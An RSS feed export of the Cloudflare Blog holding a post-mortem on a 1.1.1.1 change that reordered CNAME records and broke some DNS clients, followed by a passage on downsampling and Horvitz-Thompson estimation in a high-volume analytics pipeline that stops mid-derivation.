
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Wed, 15 Apr 2026 00:04:03 GMT</lastBuildDate>
        <item>
            <title><![CDATA[What came first: the CNAME or the A record?]]></title>
            <link>https://blog.cloudflare.com/cname-a-record-order-dns-standards/</link>
            <pubDate>Wed, 14 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[ A recent change to 1.1.1.1 accidentally altered the order of CNAME records in DNS responses, breaking resolution for some clients. This post explores the technical root cause, examines the source code of affected resolvers, and dives into the inherent ambiguities of the DNS RFCs.   ]]></description>
            <content:encoded><![CDATA[ <p>On January 8, 2026, a routine update to 1.1.1.1 aimed at reducing memory usage accidentally triggered a wave of DNS resolution failures for users across the Internet. The root cause wasn't an attack or an outage, but a subtle shift in the order of records within our DNS responses.  </p><p>While most modern software treats the order of records in DNS responses as irrelevant, we discovered that some implementations expect CNAME records to appear before everything else. When that order changed, resolution started failing. This post explores the code change that caused the shift, why it broke specific DNS clients, and the 40-year-old protocol ambiguity that makes the "correct" order of a DNS response difficult to define.</p>
    <div>
      <h2>Timeline</h2>
      <a href="#timeline">
        
      </a>
    </div>
    <p><i>All timestamps referenced are in Coordinated Universal Time (UTC).</i></p><table><tr><th><p><b>Time</b></p></th><th><p><b>Description</b></p></th></tr><tr><td><p>2025-12-02</p></td><td><p>The record reordering is introduced to the 1.1.1.1 codebase</p></td></tr><tr><td><p>2025-12-10</p></td><td><p>The change is released to our testing environment</p></td></tr><tr><td><p>2026-01-07 23:48</p></td><td><p>A global release containing the change starts</p></td></tr><tr><td><p>2026-01-08 17:40</p></td><td><p>The release reaches 90% of servers</p></td></tr><tr><td><p>2026-01-08 18:19</p></td><td><p>Incident is declared</p></td></tr><tr><td><p>2026-01-08 18:27</p></td><td><p>The release is reverted</p></td></tr><tr><td><p>2026-01-08 19:55</p></td><td><p>Revert is completed. Impact ends</p></td></tr></table>
    <div>
      <h2>What happened?</h2>
      <a href="#what-happened">
        
      </a>
    </div>
    <p>While making some improvements to lower the memory usage of our cache implementation, we introduced a subtle change to CNAME record ordering. The change was introduced on December 2, 2025, released to our testing environment on December 10, and began deployment on January 7, 2026.</p>
    <div>
      <h3>How DNS CNAME chains work</h3>
      <a href="#how-dns-cname-chains-work">
        
      </a>
    </div>
    <p>When you query for a domain like <code>www.example.com</code>, you might get a <a href="https://www.cloudflare.com/learning/dns/dns-records/dns-cname-record/"><u>CNAME (Canonical Name)</u></a> record that indicates one name is an alias for another name. It’s the job of public resolvers, such as <a href="https://www.cloudflare.com/learning/dns/what-is-1.1.1.1/"><u>1.1.1.1</u></a>, to follow this chain of aliases until it reaches a final response:</p><p><code>www.example.com → cdn.example.com → server.cdn-provider.com → 198.51.100.1</code></p><p>As 1.1.1.1 traverses this chain, it caches every intermediate record. Each record in the chain has its own <a href="https://www.cloudflare.com/learning/cdn/glossary/time-to-live-ttl/"><u>TTL (Time-To-Live)</u></a>, indicating how long we can cache it. Not all the TTLs in a CNAME chain need to be the same:</p><p><code>www.example.com → cdn.example.com (TTL: 3600 seconds) # Still cached
cdn.example.com → 198.51.100.1    (TTL: 300 seconds)  # Expired</code></p><p>When one or more records in a CNAME chain expire, it’s considered partially expired. Fortunately, since parts of the chain are still in our cache, we don’t have to resolve the entire CNAME chain again — only the part that has expired. In our example above, we would take the still valid <code>www.example.com → cdn.example.com</code> chain, and only resolve the expired <code>cdn.example.com</code> <a href="https://www.cloudflare.com/learning/dns/dns-records/dns-a-record/"><u>A record</u></a>. Once that’s done, we combine the existing CNAME chain and the newly resolved records into a single response.</p>
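<p>As an illustration of the partial-expiry logic, here is a minimal Python sketch (with hypothetical names, not our actual implementation) that splits a cached chain into its still-valid prefix and the name at which resolution must restart:</p>

```python
import time

# Hypothetical minimal model of one cached link in a CNAME chain: the owner
# name, the record data (alias target or final address), a TTL in seconds,
# and the time it was cached. Illustrative only, not 1.1.1.1's data structures.
class CachedRecord:
    def __init__(self, name, data, ttl, cached_at):
        self.name, self.data, self.ttl, self.cached_at = name, data, ttl, cached_at

    def expired(self, now):
        return now - self.cached_at >= self.ttl

def split_chain(chain, now):
    """Return (still_valid_prefix, name_to_re_resolve_from)."""
    for i, rec in enumerate(chain):
        if rec.expired(now):
            # Everything from the first expired link onward must be resolved
            # again, starting at that link's owner name.
            return chain[:i], rec.name
    return chain, None  # fully cached, nothing to re-resolve

now = time.time()
chain = [
    CachedRecord("www.example.com.", "cdn.example.com.", ttl=3600, cached_at=now - 600),
    CachedRecord("cdn.example.com.", "198.51.100.1", ttl=300, cached_at=now - 600),
]
valid, restart_at = split_chain(chain, now)  # keep the CNAME, re-resolve the A record
```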
    <div>
      <h3>The logic change</h3>
      <a href="#the-logic-change">
        
      </a>
    </div>
    <p>The code that merges these two chains is where the change occurred. Previously, the code would create a new list, insert the existing CNAME chain, and then append the new records:</p>
            <pre><code>impl PartialChain {
    /// Merges records to the cache entry to make the cached records complete.
    pub fn fill_cache(&amp;self, entry: &amp;mut CacheEntry) {
        let mut answer_rrs = Vec::with_capacity(entry.answer.len() + self.records.len());
        answer_rrs.extend_from_slice(&amp;self.records); // CNAMEs first
        answer_rrs.extend_from_slice(&amp;entry.answer); // Then A/AAAA records
        entry.answer = answer_rrs;
    }
}
</code></pre>
            <p>However, to save some memory allocations and copies, the code was changed to instead append the CNAMEs to the existing answer list:</p>
            <pre><code>impl PartialChain {
    /// Merges records to the cache entry to make the cached records complete.
    pub fn fill_cache(&amp;self, entry: &amp;mut CacheEntry) {
        entry.answer.extend_from_slice(&amp;self.records); // CNAMEs last
    }
}
</code></pre>
            <p>As a result, the responses that 1.1.1.1 returned now sometimes had the CNAME records appearing at the bottom, after the final resolved answer.</p>
    <div>
      <h3>Why this caused impact</h3>
      <a href="#why-this-caused-impact">
        
      </a>
    </div>
    <p>When DNS clients receive a response with a CNAME chain in the answer section, they also need to follow this chain to find out that <code>www.example.com</code> points to <code>198.51.100.1</code>. Some DNS client implementations handle this by keeping track of the expected name for the records as they’re iterated sequentially. When a CNAME is encountered, the expected name is updated:</p>
            <pre><code>;; QUESTION SECTION:
;; www.example.com.        IN    A

;; ANSWER SECTION:
www.example.com.    3600   IN    CNAME  cdn.example.com.
cdn.example.com.    300    IN    A      198.51.100.1
</code></pre>
            <p></p><ol><li><p>Find records for <code>www.example.com</code></p></li><li><p>Encounter <code>www.example.com. CNAME cdn.example.com</code></p></li><li><p>Find records for <code>cdn.example.com</code></p></li><li><p>Encounter <code>cdn.example.com. A 198.51.100.1</code></p></li></ol><p>When the CNAME suddenly appears at the bottom, this no longer works:</p>
            <pre><code>;; QUESTION SECTION:
;; www.example.com.	       IN    A

;; ANSWER SECTION:
cdn.example.com.    300    IN    A      198.51.100.1
www.example.com.    3600   IN    CNAME  cdn.example.com.
</code></pre>
            <p></p><ol><li><p>Find records for <code>www.example.com</code></p></li><li><p>Ignore <code>cdn.example.com. A 198.51.100.1</code> as it doesn’t match the expected name</p></li><li><p>Encounter <code>www.example.com. CNAME cdn.example.com</code></p></li><li><p>Find records for <code>cdn.example.com</code></p></li><li><p>No more records are present, so the response is considered empty</p></li></ol><p>One such implementation that broke is the <a href="https://man7.org/linux/man-pages/man3/getaddrinfo.3.html"><code><u>getaddrinfo</u></code></a> function in glibc, which is commonly used on Linux for DNS resolution. When looking at its <code>getanswer_r</code> implementation, we can indeed see it expects to find the CNAME records before any answers:</p>
            <pre><code>for (; ancount &gt; 0; --ancount)
  {
    // ... parsing DNS records ...
    
    if (rr.rtype == T_CNAME)
      {
        /* Record the CNAME target as the new expected name. */
        int n = __ns_name_unpack (c.begin, c.end, rr.rdata,
                                  name_buffer, sizeof (name_buffer));
        expected_name = name_buffer;  // Update what we're looking for
      }
    else if (rr.rtype == qtype
             &amp;&amp; __ns_samebinaryname (rr.rname, expected_name)  // Must match!
             &amp;&amp; rr.rdlength == rrtype_to_rdata_length (qtype))
      {
        /* Address record matches - store it */
        ptrlist_add (addresses, (char *) alloc_buffer_next (abuf, uint32_t));
        alloc_buffer_copy_bytes (abuf, rr.rdata, rr.rdlength);
      }
  }
</code></pre>
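<p>The matching loop above can be distilled into a short Python sketch (a simplification, not glibc's actual logic) that shows why the same set of records succeeds or fails depending purely on their order:</p>

```python
# Sequential matching: walk the answer section once, updating the expected
# name whenever a CNAME for it is seen, and collecting only address records
# whose owner matches the current expected name.
def sequential_lookup(qname, qtype, answers):
    expected = qname
    addresses = []
    for name, rtype, rdata in answers:
        if rtype == "CNAME" and name == expected:
            expected = rdata          # continue the search at the alias target
        elif rtype == qtype and name == expected:
            addresses.append(rdata)
    return addresses

cname_first = [
    ("www.example.com.", "CNAME", "cdn.example.com."),
    ("cdn.example.com.", "A", "198.51.100.1"),
]
cname_last = list(reversed(cname_first))

sequential_lookup("www.example.com.", "A", cname_first)  # finds the address
sequential_lookup("www.example.com.", "A", cname_last)   # finds nothing
```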
            <p>Another notably affected implementation was the DNSC process in three models of Cisco Ethernet switches. Switches configured to use 1.1.1.1 as their resolver experienced spontaneous reboot loops when they received a response containing the reordered CNAMEs. <a href="https://www.cisco.com/c/en/us/support/docs/smb/switches/Catalyst-switches/kmgmt3846-cbs-reboot-with-fatal-error-from-dnsc-process.html"><u>Cisco has published a service document describing the issue</u></a>.</p>
    <div>
      <h3>Not all implementations break</h3>
      <a href="#not-all-implementations-break">
        
      </a>
    </div>
    <p>Most DNS clients don’t have this issue. For example, <a href="https://www.freedesktop.org/software/systemd/man/latest/systemd-resolved.service.html"><u>systemd-resolved</u></a> first parses the records into an ordered set:</p>
            <pre><code>typedef struct DnsAnswerItem {
        DnsResourceRecord *rr; // The actual record
        DnsAnswerFlags flags;  // Which section it came from
        // ... other metadata
} DnsAnswerItem;


typedef struct DnsAnswer {
        unsigned n_ref;
        OrderedSet *items;
} DnsAnswer;
</code></pre>
            <p>When following a CNAME chain it can then search the entire answer set, even if the CNAME records don’t appear at the top.</p>
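<p>The order-independent strategy can be sketched in Python as follows (a simplified illustration, not systemd-resolved's actual code): index every record by owner name first, then follow the alias chain by lookup rather than by position:</p>

```python
# Index the whole answer section first, then walk the alias chain by name.
# Record order in the response no longer matters.
def set_based_lookup(qname, qtype, answers, max_chain=16):
    by_name = {}
    for name, rtype, rdata in answers:
        by_name.setdefault(name, []).append((rtype, rdata))
    current = qname
    for _ in range(max_chain):  # bound the walk to guard against CNAME loops
        records = by_name.get(current, [])
        addresses = [rdata for rtype, rdata in records if rtype == qtype]
        if addresses:
            return addresses
        cnames = [rdata for rtype, rdata in records if rtype == "CNAME"]
        if not cnames:
            return []
        current = cnames[0]
    return []

answers = [
    ("cdn.example.com.", "A", "198.51.100.1"),
    ("www.example.com.", "CNAME", "cdn.example.com."),  # CNAME last: still resolves
]
set_based_lookup("www.example.com.", "A", answers)
```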
    <div>
      <h2>What the RFC says</h2>
      <a href="#what-the-rfc-says">
        
      </a>
    </div>
    <p><a href="https://datatracker.ietf.org/doc/html/rfc1034"><u>RFC 1034</u></a>, published in 1987, defines much of the behavior of the DNS protocol, and should give us an answer on whether the order of CNAME records matters. <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-4.3.1"><u>Section 4.3.1</u></a> contains the following text:</p><blockquote><p>If recursive service is requested and available, the recursive response to a query will be one of the following:</p><p>- The answer to the query, possibly preface by one or more CNAME RRs that specify aliases encountered on the way to an answer.</p></blockquote><p>While "possibly preface" can be interpreted as a requirement for CNAME records to appear before everything else, it does not use normative key words, such as <a href="https://datatracker.ietf.org/doc/html/rfc2119"><u>MUST and SHOULD</u></a> that modern RFCs use to express requirements. This isn’t a flaw in RFC 1034, but simply a result of its age. <a href="https://datatracker.ietf.org/doc/html/rfc2119"><u>RFC 2119</u></a>, which standardized these key words, was published in 1997, 10 years <i>after</i> RFC 1034.</p><p>In our case, we did originally implement the specification so that CNAMEs appear first. However, we did not have any tests asserting the behavior remains consistent due to the ambiguous language in the RFC.</p>
    <div>
      <h3>The subtle distinction: RRsets vs RRs in message sections</h3>
      <a href="#the-subtle-distinction-rrsets-vs-rrs-in-message-sections">
        
      </a>
    </div>
    <p>To understand why this ambiguity exists, we need to understand a subtle but important distinction in DNS terminology.</p><p>RFC 1034 <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-3.6"><u>section 3.6</u></a> defines Resource Record Sets (RRsets) as collections of records with the same name, type, and class. For RRsets, the specification is clear about ordering:</p><blockquote><p>The order of RRs in a set is not significant, and need not be preserved by name servers, resolvers, or other parts of the DNS.</p></blockquote><p>However, RFC 1034 doesn’t clearly specify how message sections relate to RRsets. While modern DNS specifications have shown that message sections can indeed contain multiple RRsets (consider <a href="https://www.cloudflare.com/learning/dns/dnssec/how-dnssec-works/">DNSSEC</a> responses with signatures), RFC 1034 doesn’t describe message sections in those terms. Instead, it treats message sections as containing individual Resource Records (RRs).</p><p>The problem is that the RFC primarily discusses ordering in the context of RRsets but doesn't specify the ordering of different RRsets relative to each other within a message section. This is where the ambiguity lives.</p><p>RFC 1034 <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-6.2.1"><u>section 6.2.1</u></a> includes an example that demonstrates this ambiguity further. It mentions that the order of Resource Records (RRs) is not significant either:</p><blockquote><p>The difference in ordering of the RRs in the answer section is not significant.</p></blockquote><p>However, this example only shows two A records for the same name within the same RRset. It doesn't address whether this applies to different record types like CNAMEs and A records.</p>
    <div>
      <h2>CNAME chain ordering</h2>
      <a href="#cname-chain-ordering">
        
      </a>
    </div>
    <p>It turns out that this issue extends beyond putting CNAME records before other record types. Even when CNAMEs appear before other records, sequential parsing can still break if the CNAME chain itself is out of order. Consider the following response:</p>
            <pre><code>;; QUESTION SECTION:
;; www.example.com.              IN    A

;; ANSWER SECTION:
cdn.example.com.           3600  IN    CNAME  server.cdn-provider.com.
www.example.com.           3600  IN    CNAME  cdn.example.com.
server.cdn-provider.com.   300   IN    A      198.51.100.1
</code></pre>
            <p>Each CNAME belongs to a different RRset, as they have different owners, so the statement about RRset order being insignificant doesn’t apply here.</p><p>However, RFC 1034 doesn't specify that CNAME chains must appear in any particular order. There's no requirement that <code>www.example.com. CNAME cdn.example.com.</code> must appear before <code>cdn.example.com. CNAME server.cdn-provider.com.</code>. With sequential parsing, the same issue occurs:</p><ol><li><p>Find records for <code>www.example.com</code></p></li><li><p>Ignore <code>cdn.example.com. CNAME server.cdn-provider.com.</code> as it doesn’t match the expected name</p></li><li><p>Encounter <code>www.example.com. CNAME cdn.example.com</code></p></li><li><p>Find records for <code>cdn.example.com</code></p></li><li><p>Ignore <code>server.cdn-provider.com. A 198.51.100.1</code> as it doesn’t match the expected name</p></li></ol>
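<p>One way a resolver could guard against this is to canonicalize the answer section before emitting it, walking the CNAME chain from the query name so the chain always appears in order. A hypothetical Python sketch (not what 1.1.1.1 actually does):</p>

```python
# Reorder an answer section: emit each CNAME in chain order starting from
# the query name, then the remaining (terminal) records.
def order_answer(qname, answers):
    cnames = {name: rdata for name, rtype, rdata in answers if rtype == "CNAME"}
    ordered, current = [], qname
    while current in cnames:
        target = cnames.pop(current)  # pop: each link is emitted at most once
        ordered.append((current, "CNAME", target))
        current = target
    # Remaining records (e.g. the final A/AAAA RRset) follow the chain.
    ordered.extend(r for r in answers if r[1] != "CNAME")
    return ordered

shuffled = [
    ("cdn.example.com.", "CNAME", "server.cdn-provider.com."),
    ("www.example.com.", "CNAME", "cdn.example.com."),
    ("server.cdn-provider.com.", "A", "198.51.100.1"),
]
order_answer("www.example.com.", shuffled)  # chain in query order, A record last
```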
    <div>
      <h2>What should resolvers do?</h2>
      <a href="#what-should-resolvers-do">
        
      </a>
    </div>
    <p>RFC 1034 section 5 describes resolver behavior. <a href="https://datatracker.ietf.org/doc/html/rfc1034#section-5.2.2"><u>Section 5.2.2</u></a> specifically addresses how resolvers should handle aliases (CNAMEs): </p><blockquote><p>In most cases a resolver simply restarts the query at the new name when it encounters a CNAME.</p></blockquote><p>This suggests that resolvers should restart the query upon finding a CNAME, regardless of where it appears in the response. However, it's important to distinguish between different types of resolvers:</p><ul><li><p>Recursive resolvers, like 1.1.1.1, are full DNS resolvers that perform recursive resolution by querying authoritative nameservers</p></li><li><p>Stub resolvers, like glibc’s getaddrinfo, are simplified local interfaces that forward queries to recursive resolvers and process the responses</p></li></ul><p>The RFC sections on resolver behavior were primarily written with full resolvers in mind, not the simplified stub resolvers that most applications actually use. Some stub resolvers evidently don’t implement certain parts of the spec, such as the CNAME-restart logic described in the RFC. </p>
    <div>
      <h2>The DNSSEC specifications provide contrast</h2>
      <a href="#the-dnssec-specifications-provide-contrast">
        
      </a>
    </div>
    <p>Later DNS specifications demonstrate a different approach to defining record ordering. <a href="https://datatracker.ietf.org/doc/html/rfc4035"><u>RFC 4035</u></a>, which defines protocol modifications for <a href="https://www.cloudflare.com/learning/dns/dnssec/how-dnssec-works/"><u>DNSSEC</u></a>, uses more explicit language:</p><blockquote><p>When placing a signed RRset in the Answer section, the name server MUST also place its RRSIG RRs in the Answer section. The RRSIG RRs have a higher priority for inclusion than any other RRsets that may have to be included.</p></blockquote><p>The specification uses "MUST" and explicitly defines "higher priority" for <a href="https://www.cloudflare.com/learning/dns/dnssec/how-dnssec-works/"><u>RRSIG</u></a> records. However, "higher priority for inclusion" refers to whether RRSIGs should be included in the response, not where they should appear. This provides unambiguous guidance to implementers about record inclusion in DNSSEC contexts, while not mandating any particular behavior around record ordering.</p><p>For unsigned zones, however, the ambiguity from RFC 1034 remains. The word "preface" has guided implementation behavior for nearly four decades, but it has never been formally specified as a requirement.</p>
    <div>
      <h2>Do CNAME records come first?</h2>
      <a href="#do-cname-records-come-first">
        
      </a>
    </div>
    <p>While in our interpretation the RFCs do not require CNAMEs to appear in any particular order, it’s clear that at least some widely deployed DNS clients rely on it. As some systems using these clients might be updated infrequently, or never updated at all, we believe it’s best to require CNAME records to appear in order, before any other records.</p><p>Based on what we have learned during this incident, we have reverted the CNAME re-ordering and do not intend to change the order in the future.</p><p>To prevent any future incidents or confusion, we have written a proposal in the form of an <a href="https://www.ietf.org/participate/ids/"><u>Internet-Draft</u></a> to be discussed at the IETF. If consensus is reached on the clarified behavior, this would become an RFC that explicitly defines how to correctly handle CNAMEs in DNS responses, helping us and the wider DNS community navigate the protocol. The proposal can be found at <a href="https://datatracker.ietf.org/doc/draft-jabley-dnsop-ordered-answer-section/">https://datatracker.ietf.org/doc/draft-jabley-dnsop-ordered-answer-section</a>. If you have suggestions or feedback, we would love to hear your opinions, most usefully via the <a href="https://datatracker.ietf.org/wg/dnsop/about/"><u>DNSOP working group</u></a> at the IETF.</p>
            <category><![CDATA[1.1.1.1]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Resolver]]></category>
            <category><![CDATA[Standards]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Consumer Services]]></category>
            <guid isPermaLink="false">3fP84BsxwSxKr7ffpmVO6s</guid>
            <dc:creator>Sebastiaan Neuteboom</dc:creator>
        </item>
        <item>
            <title><![CDATA[Over 700 million events/second: How we make sense of too much data]]></title>
            <link>https://blog.cloudflare.com/how-we-make-sense-of-too-much-data/</link>
            <pubDate>Mon, 27 Jan 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Here we explain how we made our data pipeline scale to 700 million events per second while becoming more resilient than ever before. We share some math behind our approach and some of the designs of  ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare's network provides an enormous array of services to our customers. We collect and deliver associated data to customers in the form of event logs and aggregated analytics. As of December 2024, our data pipeline is ingesting up to 706M events per second generated by Cloudflare's services, and that represents 100x growth since our <a href="https://blog.cloudflare.com/http-analytics-for-6m-requests-per-second-using-clickhouse/"><u>2018 data pipeline blog post</u></a>. </p><p>At peak, we are moving 107 <a href="https://simple.wikipedia.org/wiki/Gibibyte"><u>GiB</u></a>/s of compressed data, either pushing it directly to customers or subjecting it to additional queueing and batching.</p><p>All of these data streams power things like <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a>, <a href="https://developers.cloudflare.com/analytics/"><u>Analytics</u></a>, and billing, as well as other products, such as training machine learning models for bot detection. This blog post is focused on techniques we use to efficiently and accurately deal with the high volume of data we ingest for our Analytics products. A previous <a href="https://blog.cloudflare.com/cloudflare-incident-on-november-14-2024-resulting-in-lost-logs/"><u>blog post</u></a> provides a deeper dive into the data pipeline for Logs. </p><p>The pipeline can be roughly described by the following diagram.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ihv6JXx19nJiEyfCaCg8V/ad7081720514bafd070cc38a04bc7097/BLOG-2486_2.jpg" />
          </figure><p>The data pipeline has multiple stages, and each can and will naturally break or slow down because of hardware failures or misconfiguration. And when that happens, there is just too much data to be able to buffer it all for very long. Eventually some will get dropped, causing gaps in analytics and a degraded product experience unless proper mitigations are in place.</p>
    <div>
      <h3>Dropping data to retain information</h3>
      <a href="#dropping-data-to-retain-information">
        
      </a>
    </div>
    <p>How does one retain valuable information from more than half a billion events per second, when some must be dropped? Drop it in a controlled way, by downsampling.</p><p>Here is a visual analogy showing the difference between uncontrolled data loss and downsampling. In both cases the same number of pixels were delivered. One is a higher resolution view of just a small portion of a popular painting, while the other shows the full painting, albeit blurry and highly pixelated.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kUGB4RLQzFb7cphMpHqAg/e7ccf871c73e0e8ca9dcac32fe265f18/Screenshot_2025-01-24_at_10.57.17_AM.png" />
          </figure><p>As we noted above, any point in the pipeline can fail, so we want the ability to downsample at any point as needed. Some services proactively downsample data at the source before it even hits Logfwdr. This makes the information extracted from that data a little bit blurry, but much more useful than what otherwise would be delivered: random chunks of the original with gaps in between, or even nothing at all. The amount of "blur" is outside our control (we make our best effort to deliver full data), but there is a robust way to estimate it, as discussed in the <a href="/how-we-make-sense-of-too-much-data/#extracting-value-from-downsampled-data"><u>next section</u></a>.</p><p>Logfwdr can decide to downsample data sitting in the buffer when it overflows. Logfwdr handles many data streams at once, so we need to prioritize them by assigning each data stream a weight and then applying <a href="https://en.wikipedia.org/wiki/Max-min_fairness"><u>max-min fairness</u></a> to better utilize the buffer. It allows each data stream to store as much as it needs, as long as the whole buffer is not saturated. Once it is saturated, streams divide it fairly according to their weighted size.</p><p>In our implementation (Go), each data stream is driven by a goroutine, and they cooperate via channels. They consult a single tracker object every time they allocate and deallocate memory. The tracker uses a <a href="https://en.wikipedia.org/wiki/Heap_(data_structure)"><u>max-heap</u></a> to always know who the heaviest participant is and what the total usage is. Whenever the total usage goes over the limit, the tracker repeatedly sends the "please shed some load" signal to the heaviest participant, until the usage is again under the limit.</p><p>The effect of this is that healthy streams, which buffer a tiny amount, allocate whatever they need without losses. 
But any lagging streams split the remaining memory allowance fairly.</p><p>We downsample more or less uniformly, by always taking some of the least downsampled batches from the buffer (using min-heap to find those) and merging them together upon downsampling.</p>
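<p>The tracker logic described above can be sketched as follows (a simplified single-threaded Python illustration; the real implementation is Go, using goroutines and channels, and sheds load by downsampling batches rather than by simply halving a counter):</p>

```python
import heapq

# Each stream reports its buffered bytes to a single tracker. When the total
# exceeds the limit, the tracker repeatedly asks the heaviest stream (found
# via a max-heap) to shed load until the total is back under the limit.
class Tracker:
    def __init__(self, limit):
        self.limit = limit
        self.usage = {}  # stream name -> buffered bytes

    def report(self, stream, nbytes):
        self.usage[stream] = nbytes
        self._rebalance()

    def _rebalance(self):
        # Max-heap over (size, stream); heapq is a min-heap, so negate sizes.
        heap = [(-size, name) for name, size in self.usage.items()]
        heapq.heapify(heap)
        while sum(self.usage.values()) > self.limit and heap:
            size, name = heapq.heappop(heap)
            # "Please shed some load": halving stands in for downsampling the
            # stream's least-downsampled batches.
            self.usage[name] = -size // 2
            heapq.heappush(heap, (-self.usage[name], name))

t = Tracker(limit=100)
t.report("healthy", 10)   # small stream: never asked to shed
t.report("lagging", 500)  # heavy stream: halved repeatedly until total fits
```

Note how the max-min property falls out: the healthy stream keeps everything it buffered, while only the heaviest participant pays for the overflow.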
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15VP0VYkrvkQboX9hrOy0q/e3d087fe704bd1b0ee41eb5b7a24b899/BLOG-2486_4.png" />
          </figure><p><sup><i>Merging keeps the batches roughly the same size and their number under control.</i></sup></p><p>Downsampling is cheap, but since data in the buffer is compressed, it causes recompression, which is the single most expensive thing we do to the data. But using extra CPU time is the last thing you want to do when the system is under heavy load! We compensate for the recompression costs by starting to downsample the fresh data as well (before it gets compressed for the first time) whenever the stream is in the "shed the load" state.</p><p>We called this approach "bottomless buffers", because you can squeeze effectively infinite amounts of data in there, and it will just automatically be thinned out. Bottomless buffers resemble <a href="https://en.wikipedia.org/wiki/Reservoir_sampling"><u>reservoir sampling</u></a>, where the buffer is the reservoir and the population comes as the input stream. But there are some differences. First is that in our pipeline the input stream of data never ends, while reservoir sampling assumes it ends to finalize the sample. Secondly, the resulting sample also never ends.</p><p>Let's look at the next stage in the pipeline: Logreceiver. It sits in front of a distributed queue. The purpose of logreceiver is to partition each stream of data by a key that makes it easier for Logpush, Analytics inserters, or some other process to consume.</p><p>Logreceiver proactively performs adaptive sampling of analytics. This improves the accuracy of analytics for small customers (receiving on the order of 10 events per day), while more aggressively downsampling large customers (millions of events per second). Logreceiver then pushes the same data at multiple resolutions (100%, 10%, 1%, etc.) into different topics in the distributed queue. 
This allows it to keep pushing something rather than nothing when the queue is overloaded, by just skipping writing the high-resolution samples of data.</p><p>The same goes for Inserters: they can skip <i>reading or writing</i> high-resolution data. The Analytics APIs can skip <i>reading</i> high resolution data. The analytical database might be unable to read high resolution data because of overload or degraded cluster state or because there is just too much to read (very wide time range or very large customer). Adaptively dropping to lower resolutions allows the APIs to return <i>some</i> results in all of those cases.</p>
    <div>
      <h3>Extracting value from downsampled data</h3>
      <a href="#extracting-value-from-downsampled-data">
        
      </a>
    </div>
    <p>Okay, we have some downsampled data in the analytical database. It looks like the original data, but with some rows missing. How do we make sense of it? How do we know if the results can be trusted?</p><p>Let's look at the math.</p>Since the amount of sampling can vary over time and between nodes in the distributed system, we need to store this information along with the data. With each event $x_i$ we store its sample interval, which is the reciprocal of its inclusion probability $\pi_i = \frac{1}{\text{sample interval}}$. For example, if we sample 1 in every 1,000 events, each of the events included in the resulting sample will have its $\pi_i = 0.001$, so the sample interval will be 1,000. When we further downsample that batch of data, the inclusion probabilities (and the sample intervals) multiply together: a 1 in 1,000 sample from a 1 in 1,000 sample is a 1 in 1,000,000 sample of the original population. The sample interval of an event can also be interpreted roughly as the number of original events that this event represents, so in the literature it is known as weight $w_i = \frac{1}{\pi_i}$.
<p></p>
We rely on the <a href="https://en.wikipedia.org/wiki/Horvitz%E2%80%93Thompson_estimator">Horvitz-Thompson estimator</a> (HT, <a href="https://www.stat.cmu.edu/~brian/905-2008/papers/Horvitz-Thompson-1952-jasa.pdf">paper</a>) in order to derive analytics about $x_i$. It gives two estimates: the analytical estimate (e.g. the population total or size) and the estimate of the variance of that estimate. The latter enables us to figure out how accurate the results are by building <a href="https://en.wikipedia.org/wiki/Confidence_interval">confidence intervals</a>. They define ranges that cover the true value with a given probability <i>(confidence level)</i>. A typical confidence level is 0.95, at which a confidence interval (a, b) tells that you can be 95% sure the true SUM or COUNT is between a and b.
<p></p><p>So far, we know how to use the HT estimator for doing SUM, COUNT, and AVG.</p>Given a sample of size $n$, consisting of values $x_i$ and their inclusion probabilities $\pi_i$, the HT estimator for the population total (i.e. SUM) would be

$$\widehat{T}=\sum_{i=1}^n{\frac{x_i}{\pi_i}}=\sum_{i=1}^n{x_i w_i}.$$

The variance of $\widehat{T}$ is:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{\pi_{ij} - \pi_i \pi_j}{\pi_{ij} \pi_i \pi_j}},$$

where $\pi_{ij}$ is the probability of both $i$-th and $j$-th events being sampled together.
<p></p>
We use <a href="https://en.wikipedia.org/wiki/Poisson_sampling">Poisson sampling</a>, where each event is subjected to an independent <a href="https://en.wikipedia.org/wiki/Bernoulli_trial">Bernoulli trial</a> ("coin toss") which determines whether the event becomes part of the sample. Since each trial is independent, we can equate $\pi_{ij} = \pi_i \pi_j$, which when plugged into the variance estimator above turns the right-hand sum to zero:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{0}{\pi_{ij} \pi_i \pi_j}},$$

thus

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{x_i^2 w_i (w_i-1)}.$$

For COUNT we use the same estimator, but plug in $x_i = 1$. This gives us:

$$\begin{align}
\widehat{C} &amp;= \sum_{i=1}^n{\frac{1}{\pi_i}} = \sum_{i=1}^n{w_i},\\
\widehat{V}(\widehat{C}) &amp;= \sum_{i=1}^n{\frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{w_i (w_i-1)}.
\end{align}$$
